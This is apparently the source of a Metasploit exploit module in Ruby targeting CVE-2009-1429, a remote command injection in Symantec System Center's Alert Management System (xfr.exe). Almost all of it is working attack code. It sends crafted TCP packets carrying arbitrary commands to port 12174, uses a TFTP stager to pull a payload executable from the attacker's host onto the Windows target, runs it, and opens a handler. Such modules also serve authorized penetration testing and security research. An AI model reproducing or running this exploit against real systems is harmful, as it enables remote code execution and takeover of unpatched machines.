Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::CmdStager
10
  include Msf::Exploit::Remote::Tcp
11
  include Msf::Exploit::EXE
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',
16
      'Description'    => %q{
17
          Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
18
          because the application fails to properly sanitize user-supplied input.
19
      },
20
      'Author'         => [ 'MC' ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'CVE', '2009-1429' ],
25
          [ 'BID', '34671' ],
26
          [ 'OSVDB', '54157' ],
27
          [ 'ZDI', '09-060' ],
28
          [ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]
29
        ],
30
      'Targets'       =>
31
        [
32
          [ 'Windows Universal',
33
            {
34
              'Arch' => ARCH_X86,
35
              'Platform' => 'win'
36
            }
37
          ]
38
        ],
39
      'CmdStagerFlavor' => 'tftp',
40
      'Privileged' => true,
41
      'Platform' => 'win',
42
      'DefaultTarget' => 0,
43
      'DisclosureDate' => '2009-04-28'))
44

45
    register_options(
46
      [
47
        Opt::RPORT(12174),
48
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
49
      ])
50
  end
51

52
  def windows_stager
53
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
54
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
55
    execute_cmdstager({ temp: '.', tftphost: tftphost })
56
    @payload_exe = generate_payload_exe
57

58
    print_status("Attempting to execute the payload...")
59
    execute_command(@payload_exe)
60
  end
61

62
  def execute_command(cmd, opts = {})
63

64
    connect
65

66
      len  = 2 + cmd.length
67

68
      data =  [0x00000000].pack('V')
69
      data << len.chr
70
      data << "\x00"
71
      data << cmd + " "
72
      data << "\x00"
73

74
      sock.put(data)
75

76
      res = sock.get_once
77

78
        if (!res)
79
          print_error("Did not received data. Failed?")
80
        else
81
          print_good("Got data, execution successful!")
82
        end
83

84
    disconnect
85

86
  end
87

88
  def exploit
89
    unless datastore['CMD'].blank?
90
      print_status("Executing command '#{datastore['CMD']}'")
91
      execute_command(datastore['CMD'])
92
      return
93
    end
94

95
    case target['Platform']
96
      when 'win'
97
        windows_stager
98
      else
99
        fail_with(Failure::Unknown, 'Target not supported.')
100
    end
101

102
    handler
103

104
  end
105
end
106

107